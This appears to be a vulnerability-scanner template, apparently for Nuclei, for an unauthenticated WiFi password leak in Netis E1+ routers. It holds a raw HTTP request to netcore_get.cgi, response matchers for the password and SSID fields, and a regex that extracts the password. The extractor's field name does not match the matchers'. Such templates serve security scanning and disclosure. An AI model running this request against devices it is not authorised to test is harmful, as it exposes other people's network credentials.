id: netis-info-leak info: name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak author: gy741 severity: medium description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. reference: - https://www.exploit-db.com/exploits/48384 tags: netis,exposure,edb requests: - raw: - | GET //netcore_get.cgi HTTP/1.1 Host: {{Hostname}} Cookie: homeFirstShow=yes matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "rp_ap_password" - "rp_ap_ssid" part: body condition: and extractors: - type: regex part: body regex: - "'rp_soon_password':'([A-Za-z0-9]+)'"